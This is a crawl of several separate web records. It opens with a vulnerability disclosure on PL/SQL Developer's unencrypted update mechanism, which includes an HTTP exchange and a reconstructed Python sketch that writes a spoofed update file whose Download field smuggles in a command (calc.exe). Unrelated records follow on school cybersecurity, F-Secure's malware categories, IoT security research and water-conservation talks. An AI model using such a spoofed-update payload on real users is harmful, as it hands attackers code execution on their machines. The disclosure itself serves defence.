While looking into PL/SQL Developer (a very popular tool for working with Oracle databases) to see how it encrypts passwords, I noticed something interesting. When testing Windows applications, I make it a habit to have Fiddler running to see if there is any interesting traffic – and in this case, there certainly was. PL/SQL Developer has an update mechanism which retrieves a file containing information about available updates to PL/SQL Developer and other components; this file is retrieved via HTTP, meaning that an attacker in a privileged network position could modify this file. This file is retrieved each time the application starts, and if a version listed in the file is greater than the version installed, the user will be prompted to upgrade (this is the default behavior; otherwise the user is not prompted until they select Help | Check Online Updates). They have the following options:
- Update: If a URL is provided, the application will download a file (also over HTTP) and apply the update. If no URL is provided, the option is not presented to the user.
- Download: Executes the URL provided, so that the user's browser will open and immediately download the file. This is typically an executable (*.exe); as is the case elsewhere, the file is retrieved over HTTP, and no validation is being performed.
- Info: If a URL, it's executed so that the user's browser opens to the specified URL; otherwise the content is displayed in a message box.
There are (at least) two issues here:
- Redirect to malicious download: as the user is likely unaware that they shouldn't trust the file downloaded as a result of using the Download option, an attacker could replace the URL and point to a malicious file, or simply leverage their privileged position to provide a malicious file at the legitimate URL.
- Command execution: when the user selects the Download option, the value in the file is effectively ShellExecute'd, without any validation – there is no requirement that it be a URL. If a command is inserted, it will be executed in the context of the user.
This means that a user who believes they are downloading an update can actually be handing full control over to an attacker – this is a case where not bothering to use HTTPS to secure traffic can provide multiple methods for an attacker to gain control of the user's PC. This is a great example of the importance of using HTTPS for all traffic – it's not just about privacy; it's also critical for integrity. The tested version of PL/SQL Developer was 11.0.4, though the issue likely well predates that version. The vendor reports that this issue has been addressed by enforcing HTTPS on their website and through application changes made in version 11.0.6. It is recommended that all users update to the latest version. 
The update file is retrieved from http://www.allroundautomations.com/update/pls.updates – the request issued by the application looks like this:
GET http://www.allroundautomations.com/update/pls.updates HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Here's what a response looks like – it's an INI-like file, and the Download value is the item we care about most here:
HTTP/1.1 200 OK
Date: Thu, 04 Feb 2016 21:50:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Last-Modified: Fri, 11 Sep 2015 09:10:32 GMT
Keep-Alive: timeout=5, max=99
WhatsNew=Fixed "List index out of bounds" error during document generation
WhatsNew=Upgraded to work with PL/SQL Developer 9.0
WhatsNew=Improved download and Installation of Red Gate products from within Plug-In
WhatsNew=New version with Timezone correction and some bugfixes.
WhatsNew=New: allow columns to be included/excluded from export, allow first column (Line No) always include/exclude from export
WhatsNew=New: Updated for PL/SQL Developer 7.1
By changing the returned file and replacing the Download value with a command such as calc.exe, that command will be executed when the user selects the Download option. An example pls.updates file that demonstrates this flaw would make three key changes: increasing the Version, so that the user will see it as an update; clearing the Update value, so the only option is Download; and setting Download to the command that you wish to be executed (a reconstructed sketch follows below). Thanks to Garret Wassermann of CERT/CC for his assistance and Allround Automations for addressing the issue.
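The original write-up included the tampered file itself; the listing that follows is a reconstruction based on the description above, not the author's original file, and the version number and message text are assumptions. A minimal Python sketch that builds such a spoofed pls.updates payload (using calc.exe as the harmless proof-of-concept command, as in the article) might look like this:

# Reconstruction for illustration only: builds an INI-like pls.updates payload
# of the kind described above. Field names (Version, Update, Download, Info,
# WhatsNew) come from the article; the specific values are assumptions.
def build_spoofed_update(version: str = "99.0", command: str = "calc.exe") -> str:
    lines = [
        f"Version={version}",    # higher than the installed version, so an update is offered
        "Update=",               # empty, so Download is the only option presented
        f"Download={command}",   # effectively ShellExecute'd when the user clicks Download
        "Info=Important update, please install immediately.",
        "WhatsNew=Illustrative entry only.",
    ]
    return "\n".join(lines) + "\n"

if __name__ == "__main__":
    print(build_spoofed_update())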
<urn:uuid:76f71ea8-1fa4-42ad-b99f-a1facac3fa4c>
CC-MAIN-2017-09
https://adamcaudill.com/category/security_research/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00195-ip-10-171-10-108.ec2.internal.warc.gz
en
0.719412
1,060
2.5625
3
When it comes to cybersecurity, many school districts are woefully behind the times, often relying on web content filters older than their students to protect against cyber attacks. The thing is, cyber threats have evolved rapidly and the old tools just don't cut it anymore. School districts typically operate on shoestring budgets, a reality that affects how much they can spend on cybersecurity. That means many haven't been able to keep up with the increasing sophistication of cyber threats. And that makes them a prime target for hackers. Earlier this year, a district in South Carolina had to pay $10,000 to regain access to its data after a ransomware attack. An attack at a Mississippi school district forced it to shut down all its servers, disrupting operations for weeks. In 2014, the private information of 10,000 employees at Prince George's County, MD, public schools was compromised in an attack. Sadly, that's just a small sample of a growing list of cyber misdeeds. Cybercriminals that attack school networks have no shortage of motives. While ransomware is strictly a profit-making endeavor, perpetrators also can be students trying to change grades, stop testing or embarrass classmates and teachers. And of course, there are the disgruntled former employees seeking revenge. Failing to properly secure school networks can have consequences. Schools need the right tools and protocols in place to comply with regulations. Among others, those regulations include CIPA (the Children's Internet Protection Act), which deals with children's access to obscene or harmful content, and FERPA (the Family Educational Rights and Privacy Act). The latter governs the collection, storage and dissemination of student data such as academic evaluations, grades, social security numbers, attendance records and medical information. FERPA violations can lead to a loss of federal funding for a school district. Now, it would take an outright refusal to comply with FERPA for the Department of Education to cut funding, but the threat is there. And if Congress approves a proposed amendment to restrict funding to schools lacking sufficient security policies and procedures, non-compliance will become a more serious issue. To achieve compliance and a strong security posture, school districts need to invest in security solutions designed for today's cyber threats. A centralized monitoring solution that provides visibility across the network is an absolute necessity. Schools need the same level of protection as the enterprise. And that means deploying tools that protect devices on and off campus, manage resource access, monitor systems for possible intrusions and malware incursions, and facilitate the enforcement of security policies. Getting that level of protection in the past cost big bucks, but affordable cloud-based solutions offering comprehensive security are available today. The need for these tools will only continue to grow as cyber threats grow in intensity and sophistication. Fighting the threats simply can't be done with tools that were already in place before some students were born.
<urn:uuid:5ae2776c-8f74-44c9-840f-1d04a60d0a18>
CC-MAIN-2017-09
https://blog.iboss.com/sled/as-cyber-threats-intensify-schools-need-to-update-security-tools
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00195-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954761
609
2.78125
3
Programs categorized as Malware pose a significant security risk to the user's system and/or information. Types of programs in the Malware category include viruses, worms and trojans, among other threats. These threats can perform harmful actions such as stealing personal or program data, secretly manipulating the device or installed programs, or completely blocking the user from using the device. Malware is usually automatically disinfected by F-Secure Antivirus products.
Types of Malware
- Virus: Integrates its own code into program or data files and spreads by integrating itself into more files each time an affected file is run.
- Worm: Uses computer or network resources to make complete copies of itself and distribute them to other victims. May include code or other malware to damage both the system and the network. Worms can also be typed more specifically based on the kind of network they use to spread:
  - Net-Worm: over a local network or the Internet
  - Email-Worm: via emails, either contained in the email itself or as file attachments
  - P2P-Worm: in files sent over peer-to-peer (P2P) networks
  - IM-Worm: over instant messaging (IM) networks
  - IRC-Worm: over Internet Relay Chat (IRC) channels
  - Bluetooth-Worm: via Bluetooth broadcasting
- Rootkit: Hides itself or other files from the device's security programs; can be used by remote users to manipulate the device.
- Backdoor: Allows remote users to manipulate a program, computer or network.
- Trojan: Uses misdirection, misinformation, omission or outright fraud to trick the user into installing or running it, so that it can perform potentially unwanted/harmful actions. It does not replicate. Trojans can be typed more specifically based on the kind of actions they secretly perform:
  - Trojan-Spy: installs spying programs such as keyloggers
  - Trojan-PWS: steals passwords and other sensitive information
  - Trojan-Downloader: downloads programs from a remote server, then installs and launches them
  - Trojan-Dropper: carries at least one program, which it installs and launches
  - Trojan-Proxy: allows remote users to route traffic anonymously through the infected system, using it as a proxy server
  - Trojan-Dialer: connects to the Internet over premium-rate telephone lines; may also lead to unsolicited or inappropriate sites
- Rogue: Uses high-pressure or misleading messaging, or outright fraud, to pressure users into purchasing antivirus software that may not perform as claimed.
- Exploit: Takes advantage of a vulnerability in a program or operating system to gain access or perform actions beyond what is normally permitted.
- Packed: Compressed to a smaller size using a packer program known to be used by other malware.
- Constructor: A utility program used to construct malware.
Programs categorized as Spyware introduce a security risk that may affect the user's personal data. Types of programs in the Spyware category include trackware and adware. These programs may offer a useful service in exchange for being allowed to gather information from or about the user. The kind of information gathered by these programs varies, and may include items such as details of the system or installed programs; web browsing behavior and history; and most importantly, personal details. Legal implications may also arise based on where and how the program is used, and how the information is collected, transmitted and stored. 
If a user is aware of and accepts the potential risk associated with a program classed as Spyware, they can configure the F-Secure security product to exclude it from being scanned.
Types of Spyware
- Spyware: Collects information about the user's web browsing behavior or preferred applications; the data collected may be stored locally or sent out.
- Trackware: Allows a third party to identify the user or their device, usually with a unique identifier. The most common trackware is tracking cookies.
- Adware: Delivers advertising content, either in the web browser, on a PC's desktop or within an application.
Programs categorized as Riskware are considered safe when used by an authorized person in an appropriate situation, but may pose a security risk if misused or used by an attacker. For example, keyloggers are utilities that may be used by system administrators in the course of their authorized work, but may also be maliciously used to secretly monitor users. If the user is aware of and accepts the potential risk associated with a program classed as Riskware, they can configure the F-Secure security product to exclude it from being scanned.
Types of Riskware
- Monitoring-Tool: Monitors and records selected or all actions of a user on a device.
- Hack-Tool: Bypasses access restrictions or security mechanisms to give users access or the ability to perform actions beyond what is normally permitted.
- Application: Introduces a security risk if misused or maliciously used.
Potentially Unwanted Application (PUA)
A Potentially Unwanted Application (PUA) is a program that has behaviors or aspects which are considered undesirable, unwanted or risky, but does not meet the stricter definition of malware. If the user is aware of and accepts the potential risk associated with a program classed as PUA, they may elect to keep and use the application, or allow the F-Secure security product to remove it. For more information about PUAs, see Classifying Potentially Unwanted Applications.
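The taxonomy above is essentially a lookup from detection category to default handling, which is easy to see in code. The sketch below is purely illustrative and is not F-Secure's actual API or policy engine; the category names come from the text, while the mapping to actions is an assumption based on the behaviors described.

# Illustrative only: a toy mapping from the detection categories described above
# to a plausible default action. Not F-Secure's actual implementation.
DEFAULT_ACTIONS = {
    "Malware":  "disinfect",          # "usually automatically disinfected"
    "Spyware":  "block_or_exclude",   # user may exclude it from scanning if the risk is accepted
    "Riskware": "block_or_exclude",   # safe when authorized; user may exclude it
    "PUA":      "remove_or_keep",     # user may keep it or let the product remove it
}

def handle_detection(category: str, user_accepted_risk: bool = False) -> str:
    """Return the action to take for a detection, given the user's choice."""
    action = DEFAULT_ACTIONS.get(category, "quarantine")
    if user_accepted_risk and action in ("block_or_exclude", "remove_or_keep"):
        return "exclude_from_scanning"
    return action

print(handle_detection("Riskware", user_accepted_risk=True))  # exclude_from_scanning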
<urn:uuid:c62ef45c-9aef-4006-8d95-f39a5438eaef>
CC-MAIN-2017-09
https://www.f-secure.com/en/web/labs_global/classification
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.84/warc/CC-MAIN-20170219104611-00191-ip-10-171-10-108.ec2.internal.warc.gz
en
0.905063
1,183
3.21875
3
Internet Of Things Security Reaches Tipping PointPublic safety issues bubble to the top in security flaw revelations. It all began more than four years ago with HD Moore's groundbreaking research in embedded device security -- VoIP, DSL, SCADA, printers, videoconferencing, and switching equipment -- found exposed on the public Internet and sporting diagnostics backdoors put in place by developers. The holes could allow an attacker access to read and write memory and power-cycle the device in order to steal data, sabotage the firmware, and take control of the device, Moore, chief security officer at Rapid7 and creator of Metasploit, found. "This feature shouldn't be enabled" in production mode but instead deactivated, he told Dark Reading in a 2010 interview on his research on the widespread vulnerability in VxWorks-based devices. Fast forward to Black Hat USA and DEF CON 22 last week in Las Vegas, where the dominant and overarching theme was the discovery of, yes, intentional backdoors, hardcoded credentials, unencrypted traffic, and critical systems lumped on the same network as noncritical functions, in today's increasingly networked and automated commercial systems. And those embedded hardware weaknesses were on display by researchers who found them in cars, TSA checkpoint systems, satellite ground terminals, cell phones and networks, home automation and security systems -- and even baby monitors. Moore's 2010 findings and subsequent research should have been a major wakeup call for the Internet of Things. But instead the problem has now snowballed and gone mainstream as industries not schooled in cyber security got their first lesson in white-hat hacking in the past year as massive holes in their consumer products have been discovered and publicized. Now that these vulnerabilities, many of which require relatively simple fixes, have spilled into the arena of public and physical safety with hackable cars, pacemakers, road traffic systems, and airplanes, the tipping point for solving the security of Internet-connected things may finally have arrived. It's the public safety angle that may ultimately capture the attention of legislators and regulators -- if not the consumer product vendors themselves -- to start taking security seriously, experts say. "Everybody should be worried a lot. It's modified Linux in most cases [in these devices]" and there has been little if any improvement in its security, says Marc Maiffret, CTO at BeyondTrust. "A lot have lame vulnerabilities. Name your embedded system -- it's going to have something." Just how to get the consumer product world in sync with security research is the problem. Researchers routinely report bugs to the vendors and government-based organizations like the ICS-CERT, but they still either get ignored altogether by the vendors or in some cases face legal threats. "There's no framework for the level of accountability, no responsibility to accept [by the vendors]. The risk is passed on to the consumer," says Trey Ford, global security strategist at Rapid7. But there was a shift last week in Vegas, as the security community began pitching and proposing some next steps to fix the problem of vulnerable consumer goods. I Am The Cavalry, a grassroots organization formed to bridge the gap between researchers and the consumer products sector, last week at DEF CON published an open letter to CEOs at major automakers, calling for them to adopt a new five-star cyber safety program. 
The group also provided a petition via change.org for others to sign. The voluntary program includes secure software development programs, vulnerability disclosure policies, forensics information, software updates, and the segmentation and isolation of critical systems on the car's network. Joshua Corman, chief technology officer at Sonatype and co-founder of I AmThe Cavalry, says with lives at risk with many of these consumer products, such as cars, the time has come for a framework and action. Attacks against cars and other critical consumer things are a matter of public safety, he says. "You want to measure twice and cut once," he says of the need for baking security into such consumer products. [Yes, the ever-expanding attack surface of the Internet of Things is overwhelming. But next-gen security leaders gathered at Black Hat are up to the challenge. Read The Hyperconnected World Has Arrived.] Another group of security researchers is helping out smaller embedded device vendors with initial pro bono security testing of pre-production code for their IP cameras and other consumer devices. "We're going to have researchers looking at their pre-production hardware before getting it in [consumers'] hands," Mark Stanislav, a researcher with DuoSecurity, which is one of the founders of the group, said in an IoT session at DEF CON. So far, Belkin, DropCam, DipJar, and Zendo are among the IoT firms that have taken BuildItSecure.ly up on its offer. The hope is some of these smaller firms may ultimately offer bug bounties to researchers who find vulnerabilities, or will end up engaging with the firms in consulting gigs, for example. BeyondTrust's Maiffret, meanwhile, says consumer product vendors should at least open up their Linux code to open source so it can be patched and updated. "There are a lot of ARM processors running Linux and they have some software apps sitting on top... a NAS or IP camera," for instance, he says. "At least open it up so Linux can manage, patch and update it." That same theme was echoed by Dan Geer in his keynote address at Black Hat last week. Geer proposed that software that's no longer updated or supported by its vendors should be transferred to the open-source community. He also suggested that embedded devices have a finite life span. "Embedded systems, if having no remote management interface and thus out of reach, are a life form, and as the purpose of life is to end, an embedded system without a remote management interface must be so designed as to be certain to die no later than some fixed time," Geer told attendees. "Conversely, an embedded system with a remote management interface must be sufficiently self-protecting that it is capable of refusing a command." The bottom line is there's a lack of consumer product vendors taking ownership of the security of these products, Maiffret says. "We're always going to have a constant state of vulnerabilities," he says. Billy Rios at Black Hat USA discusses TSA checkpoint systems he found exposed on the public Internet. Photo Credit: Sarah Sawyer The good news is that much of the research in the more critical consumer device security -- cars, traffic control systems, for instance -- is ahead of the attackers, as far as we know, experts say. "Some of the hardware is very difficult to get," such as traffic control sensors, says Cesar Cerrudo, who last week at DEF CON provided new details on vulnerabilities he found in vehicle traffic control systems. "You can't go to the store. 
That's good for bad guys [in] that it's not easy. But at some point they can steal them or get them in some way." Cerrudo set up a phony company in order to buy traffic sensors from Sensys Networks for his research, he says. But even a more easily accessible smart TV or egg counter, if compromised, can wreak havoc on consumers. "Whatever is connected to the Internet or a network is a possible target," Cerrudo says. "We can put a man on the moon, but we can't make software reliable?" says Rick Howard, CSO at Palo Alto Networks. Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing and Secure Enterprise.
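Geer's proposal quoted earlier, that an unmanaged embedded system should be "certain to die no later than some fixed time," can be made concrete with a trivial end-of-life check. The sketch below is purely conceptual and is not from any vendor's firmware; the build date and five-year lifetime are arbitrary assumptions.

# Conceptual sketch of Geer's finite-lifespan idea for unmanaged embedded devices.
# The build date and maximum lifetime are arbitrary values for illustration.
from datetime import date, timedelta

BUILD_DATE = date(2014, 8, 1)
MAX_LIFETIME = timedelta(days=5 * 365)   # assumed five-year cap

def should_keep_running(today: date, remotely_manageable: bool) -> bool:
    """Devices without a remote management interface refuse to run past end of life."""
    if remotely_manageable:
        return True                      # can still be patched, so no forced expiry
    return today - BUILD_DATE <= MAX_LIFETIME

print(should_keep_running(date(2016, 1, 1), remotely_manageable=False))  # True
print(should_keep_running(date(2021, 1, 1), remotely_manageable=False))  # False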
<urn:uuid:ba730de6-421a-4af9-914c-a61670f4315f>
CC-MAIN-2017-09
http://www.darkreading.com/vulnerabilities---threats/internet-of-things-security-reaches-tipping-point/d/d-id/1298019?_mc=RSS_DR_EDT
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00539-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955609
1,592
2.515625
3
Water scarcity is a reality for about 1/3 of the world's population. Driving increasing water scarcity is the way we manage water for food. Projections indicate that a growing, wealthier population may need as much as 70% more food by 2050. With water scarcity already posing a constraint to food production in many areas of the world, a major question is whether we have enough water to grow enough food. In fact, it is not the amount of water that is lacking globally. Rather, we are lacking in good management of water and land resources. Finding solutions will require a different set of thinking and actions moving forward. Water scarcity has brought about a new set of problems that require new solutions. The presentation and discussion will cover water scarcity and drivers of water use within and outside the water sector, including climate change; it will ask how much more water will be needed to grow enough food; then it will provide a direction for finding solutions to future water and food problems. David Molden is Deputy Director General for Research at the International Water Management Institute (IWMI). He has a PhD, specializing in groundwater hydrology and irrigation, and has broader interests in integrating social, technical and environmental aspects of water management. Recently, David coordinated a global program involving over 700 participants to produce a Comprehensive Assessment of Water Management in Agriculture, with results documented in the publication Water for Food, Water for Life (http://www.iwmi.cgiar.org/Assessment/). David was presented with the CGIAR Outstanding Scientist Award. Recorded Apr 23, 2010; 37 mins. Laura Tam, SPUR & Manucher Alemi, Department of Water Resources More than two-thirds of the Bay Area's water is imported from outside the region. Today these supplies are regularly threatened by drought, earthquakes, water quality impairments and new regulations on availability and usage — risks that will intensify with future climate change. Meanwhile, our region of 7 million people will add 2 million more by 2040. Do we have the water we need to support our projected population growth? And what are the most sustainable and reliable ways to supply our future water needs? SPUR's report Future-Proof Water, presented by Laura Tam, analyzes the Bay Area's current water supplies and future growth projections, then recommends the best tools for meeting our water needs — both in the near term and through the end of the century. The Governor's California Water Action Plan (CWAP) released in January 2014 is a five-year plan outlining the ten central actions towards sustainable water management. In January 2015, the California Natural Resources Agency, California EPA and Department of Food and Agriculture released the CWAP Implementation Report, which highlights achievements to date and outlines activities for the next four years. Manucher Alemi will provide an overview of the CWAP and Proposition 1 to achieve sustainable water management along with DWR's roles, including expanding water conservation and water use efficiency. Peter Rumsey, Point Energy Innovations; Bobby Markowitz, Ecological Concerns Inc., Central Coast Wilds Onsite water resources including rainwater catchment and greywater can be used to decrease or eliminate the net water demand of commercial and residential developments. Integrated design incorporating smart water-efficient landscape design with water re-use systems results in "Closed Loop Design". 
New practices such as bringing rainwater into the house for domestic, non-potable use and using grey water to irrigate landscapes with native and drought tolerant plants with innovative irrigation techniques, may be the future of development in California and beyond as water resources become more scarce and unreliable. Ken Baerenklau, UC Riverside & Tim Barr, Western Municipal Water District Ken Baerenklau will present the results of a study conducted at UC Riverside that examined the effects of switching from uniform to budget-based rates in the Eastern Municipal Water District of Southern California. The study utilized ten years of monthly water bills for 12,000 customers in EMWD’s service area to calibrate a household water demand model and then estimate the effects of the budget-based rate structure on water demand after controlling for average price level, weather, and income. The rate structure appears to have reduced demand by 10-15% primarily by causing previously inefficient households to become more efficient. The second presentation, by Tim Barr, Western’s Deputy Director of Water Resources, will outline the Western Municipal Water District implementation of a water budget-based rate structure for its retail water customers. Western’s unique approach uses real-time, microzone-specific, evapotranspiration data and modified monthly turfgrass coefficients from UC research to calculate accurate landscape water budgets on a daily basis. Western’s finance and water efficiency staff collaborated with rate and horticultural consultants to develop a structure that safeguards the financial integrity of the District, provides each unique customer with the water they need, and sends appropriate pricing signals based on efficient water use with every water service bill. In 2015, Western linked the rate structure and the District’s shortage contingency program in anticipation of reduced water supplies due to statewide drought. Michelle Maddaus, Maddaus Water Management; Marty Laporte, Stanford; Amin Delagah, PG&E Food Service Technology Center The Stanford University water conservation project is a collaboration between Stanford and FishNick and it all started at the 2014 Annual PG&E water showcase! The goal of this project is to establish baseline water and energy use for old dishwashers in large kitchens and also to identify operational changes that can easily be implemented to improve efficiency of water and energy use by kitchen staff. In our presentation we will review: elements needed for setting up this project, site selection, and analysis of metering and temperature data from the old and new dishwasher and kitchen processes in a large university kitchen. The data collected by FishNick is used to establish the baseline water and energy use for old inefficient equipment. By reviewing the kitchen operations and understanding staff needs and actions, additional kitchen equipment, maintenance, and efficiency improvements will be implemented. Comparing the water and energy use for the baseline conditions with consumption after the new equipment and processes are in place, helps quantify the potential for water and energy savings and a simple payback for equipment costs. California Bay Area weather is some of the most difficult to predict across the United States due to microclimates and complex topography, yet the National Weather Service and emergency management agencies seldom are required to issue severe weather-related warnings. 
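The water budget-based rates described above rest on a standard landscape water-budget calculation: reference evapotranspiration times a plant factor times irrigated area, with a 0.62 factor converting inches over square feet to gallons, divided by irrigation efficiency. The sketch below uses that common form; the specific inputs are illustrative and are not Western Municipal Water District's actual parameters.

# Illustrative monthly landscape water budget; the ET value, plant factor, area
# and irrigation efficiency below are made-up example inputs.
def landscape_budget_gallons(eto_inches: float, plant_factor: float,
                             area_sqft: float, irrigation_efficiency: float) -> float:
    """Gallons allotted for the month: ETo * PF * area * 0.62 / efficiency."""
    return eto_inches * plant_factor * area_sqft * 0.62 / irrigation_efficiency

# Example: a hot month with 7 inches of reference ET, turf (plant factor ~0.8),
# 2,000 sq ft of irrigated landscape and 75% efficient irrigation.
print(round(landscape_budget_gallons(7.0, 0.8, 2000, 0.75)))  # about 9,259 gallons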
When moisture deficit is not on everyone’s minds, California weather is like a soldier’s life: 99% boredom and 1% panic. Infrequent so-called ‘atmospheric river’ events are the primary driver behind flooding-related hazards along the central CA coast and Bay Area, and also play a leading role in our state’s water supply. In contrast, during times of water shortage, the forecasting challenges remain while the continual emergency of drought persists over years. The National Weather Service, as part of NOAA, implements a Hydrology Program at a local level for water-related decision support and teams with other local, regional, and national resource agencies to provide information pertaining to both flooding and drought. This presentation will provide an introduction to the National Weather Service: where we’re located, what we do, and how we partner with agencies, the media, and our customer base (local citizens). We’ll also discuss how both flooding and drought are monitored and predicted, and what data and tools are publicly available that may be used as a catalyst for wise green building design that affords hazard resilience. A modicum of discussion on what the future climate portends for Bay Area water balance will also be provided. Jeremy Sigmon, U.S. Green Building Council; Adrienne Johnson, Stanford University; Jennifer Rosser, Sierra Business Council How actively are California’s green buildings addressing water conservation and management? What can we do to catalyze an even greater focus on the state’s top environmental priority in these buildings? New research reveals insights from 1,300+ LEED-certified buildings in California and offers new approaches to leverage buildings as part of the solution to the current water crisis. Sierra Business Council's Water Energy Nexus Study analyzes the potential to increase energy and water savings by improving the operational efficiency of several small to intermediate sized, Sierra foothill water agencies/districts with a focus on minimizing water losses and improving pumping efficiency. Michael Hazinski, East Bay MUD; Eileen Kelly, Dig Your Garden Landscape Design; Jodie Sheffield, Delta Bluegrass Eileen Kelly, Dig Your Garden Landscape Design, will discuss a variety of landscape design alternatives to replace or minimize the traditional lawn such as no-mow grasses, hardscape materials (gravel, decomposed granite, natural stone, boulders, mulch, and sculpture), and eco-friendly strategies such as “sheet mulching” to quickly eradicate the lawn. For over ten years, East Bay Municipal Utility District has offered rebates for converting ornamental lawn to sustainable landscaping. Hear Michael Hazinski provide a water utility perspective on the trends in consumer acceptance of sustainable landscaping and a comprehensive approach to implementing landscape water conservation incentives. Jodie Sheffield, Sod Development Expert from Delta Bluegrass Company will introduce you to their water saving California Native Sod products. The presentation and discussion will focus on: how to choose the right native sod for your project, water wise irrigation management, and how to maintain native sod. Peter MacDonagh, Kestrel Design Group/University of Minnesota Stormwater professionals have been studying stormwater control measures for decades, and foresters have been studying and growing urban trees for centuries. But the practice of combining the two to use trees as a Stormwater Control Measure is in its infancy. 
Recent results showing water quality benefits for urban tree/soil systems equal to and surpassing that of many traditional bioretention systems will be presented. As research is rapidly discovering ways to enhance performance of bioretention and urban tree/soil systems, this presentation will also highlight some of the most promising new developments, such as, for example, use of various soil amendments to enhance water quality performance, as well as design strategies to maximize stormwater volume and water quality benefits. Brent Bucknum, Hyphae Design Laboratory and Urban Biofilter & Janice Nicol, Office of Cheryl Barton This session will showcase the work of two innovative Bay Area design firms and demonstrate water conservation strategies at a range of scales-from broad-level planning and analysis through detailed landscape design and construction. We will look at recently completed projects as case studies for watershed management solutions that are at once beautiful and functional, and provide quantifiable benefits demonstrating water reduction, cost savings, and ecological improvements. Results from original research and prototype testing will be shared. Implementation strategies include stormwater management, plant and material selection, greywater systems, living roofs, water recycling, and irrigation best practices. Laura Allen, Greywater Action & Sherry Bryan, Ecology Action How does long-term use of greywater affect the soil? Do households reduce water consumption after installing a greywater system? How much maintenance is required? Find out the results of a comprehensive study of 83 greywater systems in California. We monitored the effects of greywater systems on soil, plant health, quality of irrigation water, household water consumption, as well as user satisfaction and maintenance. We will offer recommendations for future system design and installation based on the results of the study. This panel presentation will explore recently-completed work by Affiliated Engineers Inc. and Sherwood Design Engineers with a focus on projects at large institutions including Stanford University and UC Berkeley. Panelists will establish that water use reduction is cost effective even in locations without drought conditions and with moderately priced water and sewer services. Panelists will also prove the viability of water-focused ecodistricts and acknowledge that client commitment to long-term water sustainability, backed by sound economics, can guide future development. Case study examples will include university campus projects, a research building, a hospital and a former Marine Corps Air Station. Jullie Oritz, San Francisco; Deborah Elliott, Napa County; Chris Dundon, Contra Costa; Richard Harris, EBMUD; Robyn Navarra Many consider the current drought in California the worst since precipitation record keeping began over a hundred years ago. With the federal government declaring 27 California counties as “Natural Disaster Areas”, water districts are in a crisis mode. This panel discussion will include presentations by some of the largest and most progressive water utilities in Northern California: Contra Costa Water District, East Bay Municipal Utility District, Napa County, San Francisco Public Utilities Commission and Zone 7 Water Agency. Each panelist will describe the water supply outlook for their district and outline the key activities they are pursuing to reduce water use. 
Humans have been concerned over water and water supplies since agriculture and stock raising began some 10,000 years ago. What do we know about about droughts in the past and how did ancient societies handle them? Brian Fagan, an archaeologist, looks at examples from western North America and describes what we know about medieval droughts in California and their relevance to today’s water concerns. In what ways are we more vulnerable than those who lived through California droughts a thousand years ago? What fundamental differences are there between human relationships with water in the past and today? Heather Cooley, Pacific Institute; Karen Koppett, Santa Clara; Sam Newman, PG&E; Kari Binley, PG&E; Amin Delagah, PG&E Food Coordinating water-energy efficiency efforts provide a significant opportunity to achieve greater savings for both water and energy utilities. In particular, jointly run end-use water and energy efficiency programs have a huge potential to save energy and water at the home and at the supply source. Yet, coordinated programs face a number of challenges. In this panel, we will describe some of these challenges and how to overcome them. Panelists will include a researcher, a water specialist who has worked on the “Watts to Water” program and PG&E program managers for agricultural irrigation, clothes washers, and commercial kitchens. Julie Ortiz, SFPUC; Richard Harris, EBMUD; Bill McDonnell, Metropolitan Water District; Chris Dundon, Contra Costa Water Dist This session was conceived as a way to acknowledge the 10th anniversary of the Water Conservation Showcase and will be structured as a panel discussion. The intention of the session is to take a quick look back at the status of water conservation from ten years ago when the first showcase was held, consider some of the most successful conservation efforts that are active today and explore how utilities will address water management in the future. The presentation will focus on current and emerging approaches toward providing water management services and tools to assist water customers in managing their own water use. These tools are applicable to existing customers as well as new development to maximize cost-effective water efficiency benefits. The panelists are from four of the most innovative and ambitious water utilities in California: Julie Ortiz of the San Francisco Public Utilities Commission (SFPUC), Richard Harris of the East Bay Municipal Utility District (EBMUD), Bill McDonald of the Metropolitan Water District, and Chris Dundon of the Contra Costa Water District. Each panelist will provide a brief presentation on their perspective of the past, present and future of water conservation. The bulk of the session will be set aside for what promises to be a lively discussion. Dr. Juliet Christian-Smith, Senior Research Associate, Pacific Institute It is zero hour for a new US water policy! At a time when many countries are adopting new national approaches to water management, the United States still has no cohesive federal policy, and water-related authorities are dispersed across more than 30 agencies. Here, at last, is a vision for what we as a nation need to do to manage our most vital resource. In this book, leading thinkers at world-class water research institution the Pacific Institute present clear and readable analysis and recommendations for a new federal water policy to confront our national and global challenges at a critical time. What exactly is at stake? 
In the 21st century, pressures on water resources in the United States are growing and conflicts among water users are worsening. Communities continue to struggle to meet water quality standards and to ensure that safe drinking water is available for all. And new challenges are arising as climate change and extreme events worsen, new water quality threats materialize, and financial constraints grow. Yet the United States has not stepped up with adequate leadership to address these problems. The inability of national policymakers to safeguard our water makes the United States increasingly vulnerable to serious disruptions of something most of us take for granted: affordable, reliable, and safe water. This book provides an independent assessment of water issues and water management in the United States, addressing emerging and persistent water challenges from the perspectives of science, public policy, environmental justice, economics, and law. With fascinating case studies and first-person accounts of what helps and hinders good water management, this is a clear-eyed look at what we need for a 21st century U.S. water policy. Jon Gray, Principal & Senior Plumbing Engineer, Interface Engineering & Jeffrey Miller, Miller Company Landscape Architects This session will focus on the completed projects of two design firms. These case studies will highlight the innovative solutions that both firms deploy in their efforts to reduce fresh water use and waste-water run-off. The panelists are Lisa Petterson of SERA Architects Inc. and Jeffrey Miller of Miller Company Landscape Architects. The specific projects they will present are described below. Each panelist will share how water conservation measures were achieved in their projects, the measured impact of these solutions and the lessons learned that shaped their future work. The session will end with questions from attendees. In 2008, SERA Architects was commissioned to design a high-rise multi-family development to meet the then newly released Living Building Challenge Standard. The team recognized that Net Zero Water would be particularly challenging due to the water needs of a residential building. We applied for a grant to identify regulatory barriers project teams would face when creating Living Buildings. In the undertaking, we found ourselves doing more than just identifying barriers. Ultimately the team’s work 